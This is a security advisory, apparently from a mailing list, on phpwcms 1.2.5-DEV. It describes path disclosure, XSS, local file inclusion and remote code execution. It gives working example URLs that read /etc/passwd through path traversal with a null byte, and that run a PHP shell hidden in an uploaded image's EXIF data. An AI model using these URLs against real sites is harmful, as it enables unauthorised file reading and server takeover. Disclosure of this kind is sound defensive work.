Vendor: http://www.phpwcms.de Bugs: Path Disclosure, XSS, Local File Inclusion, Remote Code Execution Vulnerable Version: phpwcms 1.2.5-DEV (prior versions also maybe affected) Exploitation: Remote with browser Description: -------------------- phpwcms is a web content management system optimized for fast and easy setup on any standard web server. phpwcms is perfect for professional, public and private users. Vulnerability: -------------------- -->>Path Disclosure<<-- Reason: direct access to include files that generates php error with installation path information. Several files are vulnerable in this case. Example: http://example.com/phpwcms/include/inc_lib/files.public-userroot.inc.php http://example.com/phpwcms/include/inc_lib/files.private.additions.inc.php -->>XSS<<-- Reason: when register globals is enable several template files are vulnerable to xss. Example: http://localhost/php/phpwcms/include/inc_tmpl/content/cnt6.inc.php?BL[be_cnt_plainhtml]= Code Snippet: /include/inc_tmpl/content/cnt6.inc.php //line#28 -->>Local File Inclusion<<-- Reason: Incorrect use of spaw script (external script) and its configuration result in local file inclusion when register globals is enable and gpc_magic_quotes is Off. http://localhost/php/phpwcms/include/inc_ext/spaw/spaw_control.class.php?spaw_root=../../../../etc/passwd%00 Code Snippet: /include/inc_ext/spaw/spaw_control.class.php //lines:#15-20 if (preg_match("/:\/\//i", $spaw_root)) die ("can't include external file"); include $spaw_root.'config/spaw_control.config.php'; include $spaw_root.'class/util.class.php'; include $spaw_root.'class/toolbars.class.php'; include $spaw_root.'class/lang.class.php'; -->>Remote Code Execution<<-- Reason: It is possible for an attacker to upload a picture with php code as EXIF metadata content in his post and then he can uses above vulnerability to conduct remote code execution. Example: http://example.com/phpwcms/include/inc_ext/spaw/spaw_control.class.php?spaw_root=../../../picture/upload/shell.jpg%00 Solution: -------------------- Vendor has been contacted but we are not aware of any vendor supplied patch. Original Advisories: -------------------- http://www.kapda.ir/advisory-331.html IN Farsi:http://irannetjob.com/ Credit: -------------------- Discovered & released by trueend5 (trueend5 kapda ir) Security Science Researchers Institute Of Iran [http://www.KAPDA.ir] __________________________________________________ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com